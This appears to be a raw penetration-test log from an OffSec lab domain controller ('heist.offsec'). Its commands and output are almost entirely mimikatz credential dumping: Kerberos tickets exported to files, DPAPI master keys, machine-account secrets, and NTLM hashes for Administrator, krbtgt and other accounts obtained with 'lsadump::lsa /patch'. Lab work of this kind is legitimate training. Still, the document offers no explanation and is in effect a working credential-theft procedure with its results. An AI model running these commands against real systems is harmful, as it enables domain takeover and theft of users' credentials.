Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
[00000000]
Start/End/MaxRenew: 7/7/2025 6:39:05 AM ; 7/7/2025 4:39:05 PM ;
Service Name (02) : ldap ; DC01.heist.offsec ; @ HEIST.OFFSEC
Target Name (--) : @ HEIST.OFFSEC
Client Name (01) : DC01$ ; @ HEIST.OFFSEC
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
5565e77907f41fd33382950b154790263a4f77f1cfd4ad4ec225549a59e8e000
Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...]
* Saved to file [0;f8fa0]-1-0-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi !
Group 2 - Ticket Granting Ticket
Authentication Id : 0 ; 446257 (00000000:0006cf31)
Session : Service from 0
User Name : enox
Domain : HEIST
Logon Server : DC01
Logon Time : 8/1/2024 7:28:11 PM
SID : S-1-5-21-537427935-490066102-1511301751-1103
* Username : enox
* Domain : HEIST.OFFSEC
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 8/1/2024 7:28:11 PM ; 8/2/2024 5:28:11 AM ; 8/8/2024 7:28:11 PM
Service Name (02) : krbtgt ; HEIST.OFFSEC ; @ HEIST.OFFSEC
Target Name (02) : krbtgt ; HEIST ; @ HEIST.OFFSEC
Client Name (01) : enox ; @ HEIST.OFFSEC ( HEIST )
Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
be727dd8334980e24601b6688970f38d322994f448ab5ac841c247516458c07a
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;6cf31]-2-0-40e10000-enox@krbtgt-HEIST.OFFSEC.kirbi !
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 8/1/2024 7:27:32 PM
SID : S-1-5-19
* Username : (null)
* Domain : (null)
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
Authentication Id : 0 ; 69663 (00000000:0001101f)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 8/1/2024 7:27:32 PM
SID : S-1-5-90-0-1
* Username : DC01$
* Domain : heist.offsec
* Password : f9 ac 84 54 4b 2f db ed e6 09 18 c3 96 3e 88 04 b2 7f 0d b8 05 2e 14 5d 63 5d 59 de 72 95 d4 ee c2 0b e1 c3 41 9f fe f0 dc 6f ff d5 0a 23 c4 f8 bc 80 e0 d1 03 95 a1 82 ab 6f 9a 40 44 ab 41 df 60 24 21 7b d8 b4 73 11 05 04 55 ec 63 5e 07 b8 20 79 3b d3 00 03 a9 fc 93 3f 24 4a 6e 8d 48 92 eb d3 fa 62 6c 2f 74 4d c4 df 5f 57 fd d1 67 24 5b 5b 66 41 09 d3 43 c2 c0 5e 29 33 85 64 49 e2 0e 2e 6d ea 12 70 e6 6c 2d 21 17 43 f7 a1 f0 6b 12 49 e8 9b 5a cd d2 fe 17 96 29 cb 57 1c ab 44 4e 24 1f 3a a4 95 51 65 27 c6 d5 8d f9 dd 9e d0 d8 ae e1 3e 94 40 3a 7a 93 45 48 7d d9 a6 23 b4 18 00 15 17 b6 5b c9 04 00 72 49 75 ca 2d c8 fa a0 4f a2 85 93 de df ff 0d 6f 1d f6 eb 29 35 ce f6 9e 98 fe 3c c0 78 4e 18 78 cf be 24 aa d0 c9
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
Authentication Id : 0 ; 42584 (00000000:0000a658)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 8/1/2024 7:27:32 PM
SID : S-1-5-96-0-0
* Username : DC01$
* Domain : heist.offsec
* Password : ad db c0 be a8 03 65 40 f3 d3 fd 82 2c fa 15 d6 0d 38 59 13 77 da 11 22 96 96 87 05 2d cc b8 22 fa 9b e9 32 8d df 11 0d ac b9 1b 97 68 6b 9f 2e e5 25 98 a6 ff 75 ac de a3 cd 9a 17 d7 3d 33 f9 12 7b 71 bd f5 d8 0b 37 d0 a0 8c d8 b9 90 f4 56 e0 c3 fc 15 70 29 ae 9e b1 3f 84 70 59 f6 91 7d 0b 2f 26 7f 42 9c 21 86 4b 2b bf 43 00 db d9 4c 51 ec a7 ac ed d4 81 1f 1f bb e4 54 d7 96 3d a1 b0 23 24 e9 c3 f2 07 b6 42 c7 1f 09 7f 00 8c 6d 96 23 d5 52 c1 c6 aa 96 aa 28 c0 1b 5a 07 c9 dd 77 c2 fe f0 39 f3 a7 97 28 e6 c1 a1 a9 9a 46 f0 f9 73 38 25 9a f7 a5 66 32 0b f2 b8 48 7e 90 a8 6a d0 2e 5d ca 78 f5 27 05 46 fc 1a 0a 91 71 ff f7 a7 6d 6d a7 50 1a 7b 29 36 dd ec 71 89 02 e1 55 78 2b b2 d9 07 06 44 8a 50 d4 32 e4 84 a7 64
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
Authentication Id : 0 ; 42510 (00000000:0000a60e)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 8/1/2024 7:27:32 PM
SID : S-1-5-96-0-1
* Username : DC01$
* Domain : heist.offsec
* Password : f9 ac 84 54 4b 2f db ed e6 09 18 c3 96 3e 88 04 b2 7f 0d b8 05 2e 14 5d 63 5d 59 de 72 95 d4 ee c2 0b e1 c3 41 9f fe f0 dc 6f ff d5 0a 23 c4 f8 bc 80 e0 d1 03 95 a1 82 ab 6f 9a 40 44 ab 41 df 60 24 21 7b d8 b4 73 11 05 04 55 ec 63 5e 07 b8 20 79 3b d3 00 03 a9 fc 93 3f 24 4a 6e 8d 48 92 eb d3 fa 62 6c 2f 74 4d c4 df 5f 57 fd d1 67 24 5b 5b 66 41 09 d3 43 c2 c0 5e 29 33 85 64 49 e2 0e 2e 6d ea 12 70 e6 6c 2d 21 17 43 f7 a1 f0 6b 12 49 e8 9b 5a cd d2 fe 17 96 29 cb 57 1c ab 44 4e 24 1f 3a a4 95 51 65 27 c6 d5 8d f9 dd 9e d0 d8 ae e1 3e 94 40 3a 7a 93 45 48 7d d9 a6 23 b4 18 00 15 17 b6 5b c9 04 00 72 49 75 ca 2d c8 fa a0 4f a2 85 93 de df ff 0d 6f 1d f6 eb 29 35 ce f6 9e 98 fe 3c c0 78 4e 18 78 cf be 24 aa d0 c9
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
Authentication Id : 0 ; 42419 (00000000:0000a5b3)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 8/1/2024 7:27:32 PM
SID : S-1-5-96-0-0
* Username : DC01$
* Domain : heist.offsec
* Password : f9 ac 84 54 4b 2f db ed e6 09 18 c3 96 3e 88 04 b2 7f 0d b8 05 2e 14 5d 63 5d 59 de 72 95 d4 ee c2 0b e1 c3 41 9f fe f0 dc 6f ff d5 0a 23 c4 f8 bc 80 e0 d1 03 95 a1 82 ab 6f 9a 40 44 ab 41 df 60 24 21 7b d8 b4 73 11 05 04 55 ec 63 5e 07 b8 20 79 3b d3 00 03 a9 fc 93 3f 24 4a 6e 8d 48 92 eb d3 fa 62 6c 2f 74 4d c4 df 5f 57 fd d1 67 24 5b 5b 66 41 09 d3 43 c2 c0 5e 29 33 85 64 49 e2 0e 2e 6d ea 12 70 e6 6c 2d 21 17 43 f7 a1 f0 6b 12 49 e8 9b 5a cd d2 fe 17 96 29 cb 57 1c ab 44 4e 24 1f 3a a4 95 51 65 27 c6 d5 8d f9 dd 9e d0 d8 ae e1 3e 94 40 3a 7a 93 45 48 7d d9 a6 23 b4 18 00 15 17 b6 5b c9 04 00 72 49 75 ca 2d c8 fa a0 4f a2 85 93 de df ff 0d 6f 1d f6 eb 29 35 ce f6 9e 98 fe 3c c0 78 4e 18 78 cf be 24 aa d0 c9
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : DC01$
Domain : HEIST
Logon Server : (null)
Logon Time : 8/1/2024 7:27:30 PM
SID : S-1-5-18
* Username : dc01$
* Domain : HEIST.OFFSEC
* Password : f9 ac 84 54 4b 2f db ed e6 09 18 c3 96 3e 88 04 b2 7f 0d b8 05 2e 14 5d 63 5d 59 de 72 95 d4 ee c2 0b e1 c3 41 9f fe f0 dc 6f ff d5 0a 23 c4 f8 bc 80 e0 d1 03 95 a1 82 ab 6f 9a 40 44 ab 41 df 60 24 21 7b d8 b4 73 11 05 04 55 ec 63 5e 07 b8 20 79 3b d3 00 03 a9 fc 93 3f 24 4a 6e 8d 48 92 eb d3 fa 62 6c 2f 74 4d c4 df 5f 57 fd d1 67 24 5b 5b 66 41 09 d3 43 c2 c0 5e 29 33 85 64 49 e2 0e 2e 6d ea 12 70 e6 6c 2d 21 17 43 f7 a1 f0 6b 12 49 e8 9b 5a cd d2 fe 17 96 29 cb 57 1c ab 44 4e 24 1f 3a a4 95 51 65 27 c6 d5 8d f9 dd 9e d0 d8 ae e1 3e 94 40 3a 7a 93 45 48 7d d9 a6 23 b4 18 00 15 17 b6 5b c9 04 00 72 49 75 ca 2d c8 fa a0 4f a2 85 93 de df ff 0d 6f 1d f6 eb 29 35 ce f6 9e 98 fe 3c c0 78 4e 18 78 cf be 24 aa d0 c9
Group 0 - Ticket Granting Service
[00000000]
Start/End/MaxRenew: 7/7/2025 8:55:20 AM ; 7/7/2025 4:39:05 PM ; 7/14/2025 6:39:05 AM
Service Name (02) : HOST ; DC01.heist.offsec ; heist.offsec ; @ HEIST.OFFSEC
Target Name (02) : HOST ; DC01.heist.offsec ; heist.offsec ; @ HEIST.OFFSEC
Client Name (01) : DC01$ ; @ HEIST.OFFSEC
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
94160d0c3c0460ff6cc3ba28f680b2378943450a92260fc0cbd7397280e97f21
Ticket : 0x00000012 - aes256_hmac ; kvno = 6 [...]
* Saved to file [0;3e7]-0-0-40a50000-DC01$@HOST-DC01.heist.offsec.kirbi !
[00000001]
Start/End/MaxRenew: 7/7/2025 6:51:36 AM ; 7/7/2025 4:39:05 PM ; 7/14/2025 6:39:05 AM
Service Name (02) : GC ; DC01.heist.offsec ; heist.offsec ; @ HEIST.OFFSEC
Target Name (02) : GC ; DC01.heist.offsec ; heist.offsec ; @ HEIST.OFFSEC
Client Name (01) : DC01$ ; @ HEIST.OFFSEC ( heist.offsec )
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
0b0d9c36e92a3ec3af5d54819d426b8bf9f5c87c78310b0539708d7440343ce7
Ticket : 0x00000012 - aes256_hmac ; kvno = 6 [...]
* Saved to file [0;3e7]-0-1-40a50000-DC01$@GC-DC01.heist.offsec.kirbi !
[00000002]
Start/End/MaxRenew: 7/7/2025 6:46:24 AM ; 7/7/2025 4:39:05 PM ; 7/14/2025 6:39:05 AM
Service Name (02) : cifs ; DC01 ; @ HEIST.OFFSEC
Target Name (02) : cifs ; DC01 ; @ HEIST.OFFSEC
Client Name (01) : DC01$ ; @ HEIST.OFFSEC
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
fdcef0a46e0716bcd5a884128cb7ada815223da0686b31dd70a9b234e272927b
Ticket : 0x00000012 - aes256_hmac ; kvno = 6 [...]
* Saved to file [0;3e7]-0-2-40a50000-DC01$@cifs-DC01.kirbi !
[00000003]
Start/End/MaxRenew: 7/7/2025 6:44:13 AM ; 7/7/2025 4:39:05 PM ; 7/14/2025 6:39:05 AM
Service Name (02) : LDAP ; DC01 ; @ HEIST.OFFSEC
Target Name (02) : LDAP ; DC01 ; @ HEIST.OFFSEC
Client Name (01) : DC01$ ; @ HEIST.OFFSEC
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
2f6317f1f362e0f6143ca26f202b7dd4512f992d0beb363dff8dae9c54578b44
Ticket : 0x00000012 - aes256_hmac ; kvno = 6 [...]
* Saved to file [0;3e7]-0-3-40a50000-DC01$@LDAP-DC01.kirbi !
[00000004]
Start/End/MaxRenew: 7/7/2025 6:42:39 AM ; 7/7/2025 4:39:05 PM ; 7/14/2025 6:39:05 AM
Service Name (02) : cifs ; DC01.heist.offsec ; heist.offsec ; @ HEIST.OFFSEC
Target Name (02) : cifs ; DC01.heist.offsec ; heist.offsec ; @ HEIST.OFFSEC
Client Name (01) : DC01$ ; @ HEIST.OFFSEC ( heist.offsec )
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
04cee63b2830f4189168d372efc46092fee0371013586a76fdd421284605d00c
Ticket : 0x00000012 - aes256_hmac ; kvno = 6 [...]
* Saved to file [0;3e7]-0-4-40a50000-DC01$@cifs-DC01.heist.offsec.kirbi !
[00000005]
Start/End/MaxRenew: 7/7/2025 6:42:39 AM ; 7/7/2025 4:39:05 PM ; 7/14/2025 6:39:05 AM
Service Name (01) : DC01$ ; @ HEIST.OFFSEC
Target Name (01) : DC01$ ; @ HEIST.OFFSEC
Client Name (01) : DC01$ ; @ HEIST.OFFSEC
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
95e3fb9ae9e124c6c66aa675f19f602b6be1796fe7fb9d1f13ca3a31f46264ca
Ticket : 0x00000012 - aes256_hmac ; kvno = 6 [...]
* Saved to file [0;3e7]-0-5-40a50000.kirbi !
[00000006]
Start/End/MaxRenew: 7/7/2025 6:41:09 AM ; 7/7/2025 4:39:05 PM ; 7/14/2025 6:39:05 AM
Service Name (02) : HTTP ; DC01.heist.offsec ; @ HEIST.OFFSEC
Target Name (02) : HTTP ; DC01.heist.offsec ; @ HEIST.OFFSEC
Client Name (01) : DC01$ ; @ HEIST.OFFSEC
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
3a1d4fcc432594be1a126293551294194bc94eda208f888c3d1f0f61feabc5d8
Ticket : 0x00000012 - aes256_hmac ; kvno = 6 [...]
* Saved to file [0;3e7]-0-6-40a50000-DC01$@HTTP-DC01.heist.offsec.kirbi !
[00000007]
Start/End/MaxRenew: 7/7/2025 6:39:05 AM ; 7/7/2025 4:39:05 PM ; 7/14/2025 6:39:05 AM
Service Name (02) : ldap ; DC01.heist.offsec ; heist.offsec ; @ HEIST.OFFSEC
Target Name (02) : ldap ; DC01.heist.offsec ; heist.offsec ; @ HEIST.OFFSEC
Client Name (01) : DC01$ ; @ HEIST.OFFSEC ( HEIST.OFFSEC )
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
e3debf27461bcc5343d2c085f52370682c7fcc60141ef0d5d3ea24a929f39d6e
Ticket : 0x00000012 - aes256_hmac ; kvno = 6 [...]
* Saved to file [0;3e7]-0-7-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi !
[00000008]
Start/End/MaxRenew: 7/7/2025 6:39:05 AM ; 7/7/2025 4:39:05 PM ; 7/14/2025 6:39:05 AM
Service Name (02) : ldap ; DC01.heist.offsec ; @ HEIST.OFFSEC
Target Name (02) : ldap ; DC01.heist.offsec ; @ HEIST.OFFSEC
Client Name (01) : DC01$ ; @ HEIST.OFFSEC
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
5565e77907f41fd33382950b154790263a4f77f1cfd4ad4ec225549a59e8e000
Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...]
* Saved to file [0;3e7]-0-8-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi !
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 7/7/2025 6:39:08 AM ; 7/7/2025 4:39:05 PM ; 7/14/2025 6:39:05 AM
Service Name (02) : krbtgt ; HEIST.OFFSEC ; @ HEIST.OFFSEC
Target Name (--) : @ HEIST.OFFSEC
Client Name (01) : DC01$ ; @ HEIST.OFFSEC ( $$Delegation Ticket$$ )
Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
7eaee295a9e8b9a20981c84956a448c8a8f12076fa1a5107cc8e0e97d1169975
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;3e7]-2-0-60a10000-DC01$@krbtgt-HEIST.OFFSEC.kirbi !
[00000001]
Start/End/MaxRenew: 7/7/2025 6:39:05 AM ; 7/7/2025 4:39:05 PM ; 7/14/2025 6:39:05 AM
Service Name (02) : krbtgt ; HEIST.OFFSEC ; @ HEIST.OFFSEC
Target Name (02) : krbtgt ; HEIST.OFFSEC ; @ HEIST.OFFSEC
Client Name (01) : DC01$ ; @ HEIST.OFFSEC ( HEIST.OFFSEC )
Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
aff6a42e69378ba48f0474ea2120f155ad4e5e8d3d3fbabe46c7911ca338d9b0
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;3e7]-2-1-40e10000-DC01$@krbtgt-HEIST.OFFSEC.kirbi !
mimikatz(commandline) # exit
Bye!
Directory: C:\tmp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/7/2025 10:56 AM 1459 [0;10c012]-2-0-60a10000-DC01$@krbtgt-HEIST.OFFSEC.kirbi
-a---- 7/7/2025 10:56 AM 1667 [0;11cb9b5]-1-0-40a50000-DC01$@GC-DC01.heist.offsec.kirbi
-a---- 7/7/2025 10:56 AM 1643 [0;256bea]-1-0-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi
-a---- 7/7/2025 10:56 AM 1643 [0;256cf9]-1-0-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi
-a---- 7/7/2025 10:56 AM 1643 [0;25794f]-1-0-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi
-a---- 7/7/2025 10:56 AM 1671 [0;3e4]-0-0-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi
-a---- 7/7/2025 10:56 AM 1459 [0;3e4]-2-0-40e10000-DC01$@krbtgt-HEIST.OFFSEC.kirbi
-a---- 7/7/2025 10:57 AM 1671 [0;3e7]-0-0-40a50000-DC01$@HOST-DC01.heist.offsec.kirbi
-a---- 7/7/2025 10:57 AM 1667 [0;3e7]-0-1-40a50000-DC01$@GC-DC01.heist.offsec.kirbi
-a---- 7/7/2025 10:57 AM 1617 [0;3e7]-0-2-40a50000-DC01$@cifs-DC01.kirbi
-a---- 7/7/2025 10:57 AM 1617 [0;3e7]-0-3-40a50000-DC01$@LDAP-DC01.kirbi
-a---- 7/7/2025 10:57 AM 1671 [0;3e7]-0-4-40a50000-DC01$@cifs-DC01.heist.offsec.kirbi
-a---- 7/7/2025 10:57 AM 1607 [0;3e7]-0-5-40a50000.kirbi
-a---- 7/7/2025 10:57 AM 1643 [0;3e7]-0-6-40a50000-DC01$@HTTP-DC01.heist.offsec.kirbi
-a---- 7/7/2025 10:57 AM 1671 [0;3e7]-0-7-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi
-a---- 7/7/2025 10:57 AM 1643 [0;3e7]-0-8-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi
-a---- 7/7/2025 10:57 AM 1459 [0;3e7]-2-0-60a10000-DC01$@krbtgt-HEIST.OFFSEC.kirbi
-a---- 7/7/2025 10:57 AM 1459 [0;3e7]-2-1-40e10000-DC01$@krbtgt-HEIST.OFFSEC.kirbi
-a---- 7/7/2025 10:56 AM 1517 [0;4b3fbe6]-1-0-50a50000-svc_apache$@HTTP-dc01.heist.offsec.kirbi
-a---- 7/7/2025 10:56 AM 1517 [0;4b6c5a8]-1-0-50a50000-svc_apache$@HTTP-dc01.heist.offsec.kirbi
-a---- 7/7/2025 10:56 AM 1441 [0;6cf31]-2-0-40e10000-enox@krbtgt-HEIST.OFFSEC.kirbi
-a---- 7/7/2025 10:56 AM 1671 [0;8c5997]-1-0-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi
-a---- 7/7/2025 10:56 AM 1643 [0;f8fa0]-1-0-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi sekurlsa::dpapi
PS C:\tmp> .\mimikatz.exe "privilege::debug" "sekurlsa::dpapi" "exit" # DPAPI master keys (browser/credential decryption)
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # sekurlsa::dpapi
Authentication Id : 0 ; 69682 (00000000:00011032)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 8/1/2024 7:27:32 PM
SID : S-1-5-90-0-1
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : DC01$
Domain : HEIST
Logon Server : (null)
Logon Time : 8/1/2024 7:27:32 PM
SID : S-1-5-20
Authentication Id : 0 ; 42579 (00000000:0000a653)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 8/1/2024 7:27:32 PM
SID : S-1-5-96-0-1
Authentication Id : 0 ; 39710 (00000000:00009b1e)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 8/1/2024 7:27:30 PM
SID :
Authentication Id : 0 ; 446257 (00000000:0006cf31)
Session : Service from 0
User Name : enox
Domain : HEIST
Logon Server : DC01
Logon Time : 8/1/2024 7:28:11 PM
SID : S-1-5-21-537427935-490066102-1511301751-1103
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 8/1/2024 7:27:32 PM
SID : S-1-5-19
Authentication Id : 0 ; 69663 (00000000:0001101f)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 8/1/2024 7:27:32 PM
SID : S-1-5-90-0-1
Authentication Id : 0 ; 42584 (00000000:0000a658)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 8/1/2024 7:27:32 PM
SID : S-1-5-96-0-0
Authentication Id : 0 ; 42510 (00000000:0000a60e)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 8/1/2024 7:27:32 PM
SID : S-1-5-96-0-1
Authentication Id : 0 ; 42419 (00000000:0000a5b3)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 8/1/2024 7:27:32 PM
SID : S-1-5-96-0-0
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : DC01$
Domain : HEIST
Logon Server : (null)
Logon Time : 8/1/2024 7:27:30 PM
SID : S-1-5-18
[00000000]
* GUID : {392a6512-1525-4008-b23e-25de0a07551a}
* Time : 7/7/2025 9:51:33 AM
* MasterKey : 2066f53e136763a9795d5ae9af43bc4cdb73725d302b17473aac944e21591159852109a89ba6a33193c894f30498f258ff9ebbbcf6f1bb63f9a52fc3c3c9eab7
* sha1(key) : 4903692de0abcea97a9b9542de21eebea659d6aa
[00000001]
* GUID : {de8ed9c0-3657-4403-b29f-de083ac87fbe}
* Time : 7/7/2025 7:07:53 AM
* MasterKey : d3782da157dc6f42d3b37429d48717e2985078d0620a7d047818264c06862dde0761d325ee2526272b7f1ace35e2843580332c1f2dac660b7d0a80e57c8d241a
* sha1(key) : b477599a23d330e8d3b8d6a7a04863f16c5f9637
[00000002]
* GUID : {fe3da89d-a34f-4b38-9131-2fa7e1cf7289}
* Time : 7/7/2025 6:38:54 AM
* MasterKey : 54d9276abda081c84dc7362e55e6b0cecee8ada0d58fe1887a720c7d6546d1463939b78ee9d7575e06074b7fe33d0603dbecd4ba5efdfe276a0cf8090c01a361
* sha1(key) : 4d9f7168a37cd8e0f8eee77d8a3b040d804b3951
[00000003]
* GUID : {d7f96ad7-0001-4a49-a80a-330f4618f11d}
* Time : 8/1/2024 7:27:32 PM
* MasterKey : df728e14eb5d4a2189e63f0d23ce99c4b8ea145e3f9b255a48389e2d387755db6612029f57f873aed6e359eff43409af4a1d7b6f92a3799ed9555d234de46edb
* sha1(key) : efe4285454fd8e475aab94594aaec67af54f0da5
[00000004]
* GUID : {6ecc8dea-14dc-4829-82bd-b4d5bd8e8bd1}
* Time : 7/7/2025 10:21:18 AM
* MasterKey : d2f0f20f97dfe5bea753fda881b9dce0c0b620c09ff5fa910db33ffe4bb26577ac7d58f5585b1b33a8cf9fdea5b54d26ba4a22ce74795c8e71f34861b0804b05
* sha1(key) : fead27a4574dbccd155e6d98016bb1f5d557983d
[00000005]
* GUID : {88612f0d-e589-4062-ac72-b9de3850e985}
* Time : 8/1/2024 7:27:32 PM
* MasterKey : 051b435a3d09f1ca87693af5494efbcc69c72ba48f1459c4e5d150f7832763e40ddee60c924e05f4b8c89db7fe446883f19fa82050e6a45da7efc271dc360865
* sha1(key) : 21eb6e12b3b55e0fef5818d8e9a861c9e4aa28b7
[00000006]
* GUID : {9ed8ba17-ab19-4b17-9456-739c7ef727a8}
* Time : 8/1/2024 7:27:32 PM
* MasterKey : 45c6c09e8f523c8c2d01ce3552ab3c10a3cb074f12af66ab3a0082835a2e10a22ac1836b95af16213124699c1b962034ecb414ca4e25c26224fbff9f7cff83e9
* sha1(key) : fe2da4f188e041b38ebbf075d53e2d2063d68612
mimikatz(commandline) # exit
Bye!lsadump::lsa /patch
PS C:\tmp> .\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::lsa /patch" "exit" # Domain hashes + LSA secrets
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
568 {0;000003e7} 1 D 34989 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000003e7} 0 D 80734885 NT AUTHORITY\SYSTEM S-1-5-18 (04g,28p) Primary
* Thread Token : {0;000003e7} 1 D 80759415 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # lsadump::lsa /patch
Domain : HEIST / S-1-5-21-537427935-490066102-1511301751
RID : 000001f4 (500)
User : Administrator
LM :
NTLM : b325100ee400c16d56c42f9685381139
RID : 000001f5 (501)
User : Guest
LM :
NTLM :
RID : 000001f6 (502)
User : krbtgt
LM :
NTLM : 3198641a390fccf87a72629f8fd1bd37
RID : 0000044f (1103)
User : enox
LM :
NTLM : bddb2a060aac3fb97c34707fabee7f30
RID : 000003e8 (1000)
User : DC01$
LM :
NTLM : 1561bd404f929907a89517d421b5f11b
RID : 00000451 (1105)
User : svc_apache$
LM :
NTLM : f018713880015ab7b496f7bbf049f0fc
mimikatz(commandline) # exit
Bye!Administrator:b325100ee400c16d56c42f9685381139krbtgt:3198641a390fccf87a72629f8fd1bd37enox:bddb2a060aac3fb97c34707fabee7f30DC01$:1561bd404f929907a89517d421b5f11bsvc_apache$:f018713880015ab7b496f7bbf049f0fc
lsadump::sam
PS C:\tmp> .\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit" # Local account hashes
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
568 {0;000003e7} 1 D 34989 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000003e7} 0 D 80784968 NT AUTHORITY\SYSTEM S-1-5-18 (04g,28p) Primary
